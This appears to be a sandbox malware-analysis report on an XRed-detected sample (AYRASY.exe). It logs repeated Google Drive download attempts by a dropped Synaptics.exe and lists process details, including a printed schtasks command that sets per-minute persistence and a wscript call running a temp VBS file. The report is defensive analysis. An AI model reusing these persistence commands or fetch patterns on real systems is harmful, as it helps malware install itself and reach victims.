2024-12-30 10:24:27 UTC | 115 | IN | Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
    Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49836 | 142.250.186.46 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:27 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:24:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:27 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-YrPj8-CoKgUb4zUCSD9BIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49845 | 142.250.186.46 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:28 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:24:28 UTC | 1314 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:28 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: script-src 'report-sample' 'nonce-5ZLVO5miCYwoO-Snio7p6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Cross-Origin-Opener-Policy: same-origin
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49852 | 142.250.186.46 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:28 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:24:28 UTC | 1314 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:28 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-WdDrIByO0OX5aM7f_IcTaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49853 | 172.217.23.97 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:28 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
2024-12-30 10:24:28 UTC | 1243 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFiumC5Eq4TD4ILL790l7uH5J7z2wbhr4Zmgs6GN2XBwQlw4ULxXgrDMJE5CbSQxx2bJnMtY
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:24:28 GMT
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'report-sample' 'nonce-hU4WgPMxJNCXNXDc4w6K0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close
2024-12-30 10:24:28 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:24:28 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="MQfTzygbE5tF5lMLTx0rxQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:24:28 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 49858 | 172.217.23.97 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:29 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
2024-12-30 10:24:29 UTC | 1243 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFiumC62pXpF9gPxS4A8wBQVnREIVhhZgjAjf-LpjAHz2m6qfDN1JYdmwcJAmCFIEIo2nkK4
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:24:29 GMT
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-pJ21Rb7YEukVyuqOnJ_5cQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close
2024-12-30 10:24:29 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:24:29 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="Q3U1MVJmSp5WaUuOyqhadA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:24:29 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 49859 | 142.250.186.46 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-30 10:24:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:24:29 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'report-sample' 'nonce-NhFBnas0-B6DOhMiUNoLhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 49861 | 142.250.186.46 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-30 10:24:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:24:29 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: script-src 'report-sample' 'nonce-j_wzQHjqvHySxusf84xmZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            21192.168.2.649862172.217.23.974435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                                                                                                            2024-12-30 10:24:30 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                            X-GUploader-UploadID: AFiumC5H8Rf2gxopgfU0LNy-PTnvK8i1CW1NpBbzXJGXOXOtCKkUv8iXakdI_QrBpvRvClQZ
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:24:29 GMT
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-fntrifWRNxc3w0N0Tpos8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close
2024-12-30 10:24:30 UTC | 147 | IN | Data Raw: (hex dump omitted; decoded text follows)
Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:24:30 UTC | 1390 | IN | Data Raw: (hex dump omitted; decoded text follows)
Data Ascii: t Found)!!1</title><style nonce="gII6-sEK2LFn3b-3z23ebQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:24:30 UTC | 115 | IN | Data Raw: (hex dump omitted; decoded text follows)
Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 49868 | 172.217.23.97 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:35 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
2024-12-30 10:24:35 UTC | 1243 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFiumC7kehbyELL0W91XsWCbMg9moQ5Wzh-IbfwZp6bVz_HIu12WHEwQX_rE4NWCjY54xl4K
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:24:35 GMT
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-kbX6avv9aSR2lRkvvhaC_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close
2024-12-30 10:24:35 UTC | 147 | IN | Data Raw: (hex dump omitted; decoded text follows)
Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:24:35 UTC | 1390 | IN | Data Raw: (hex dump omitted; decoded text follows)
Data Ascii: t Found)!!1</title><style nonce="svKMwJTsiiol-_lGeT6aOw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:24:35 UTC | 115 | IN | Data Raw: (hex dump omitted; decoded text follows)
Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 49867 | 142.250.186.46 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-30 10:24:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:24:35 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'report-sample' 'nonce-7nR4tlZ2BFl1LKQRL8Yh_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Target ID: 0
Start time: 05:24:05
Start date: 30/12/2024
Path: C:\Users\user\Desktop\AYRASY.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\AYRASY.exe"
Imagebase: 0x400000
File size: 1'750'016 bytes
MD5 hash: 07E25C260C13B82CD867DAEF02255C82
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 05:24:05
Start date: 30/12/2024
Path: C:\Users\user\Desktop\._cache_AYRASY.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\._cache_AYRASY.exe"
Imagebase: 0x170000
File size: 978'432 bytes
MD5 hash: 8E44132C27ADC94100C8D8BE5D4AD041
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 47%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 3
Start time: 05:24:05
Start date: 30/12/2024
Path: C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit): true
Commandline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Imagebase: 0x400000
File size: 771'584 bytes
MD5 hash: 27C056CC4DAFB6B3161272E800C85E55
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.2300553454.0000000000750000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 92%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 4
Start time: 05:24:07
Start date: 30/12/2024
Path: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Imagebase: 0xaf0000
File size: 53'161'064 bytes
MD5 hash: 4A871771235598812032C822E6F68F19
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 5
Start time: 05:24:08
Start date: 30/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1
Imagebase: 0x1c0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 05:24:08
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 05:24:08
Start date: 30/12/2024
Path: C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit): true
Commandline: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs
Imagebase: 0x3d0000
                                                                                                                            File size:147'456 bytes
                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3411280080.0000000002D20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
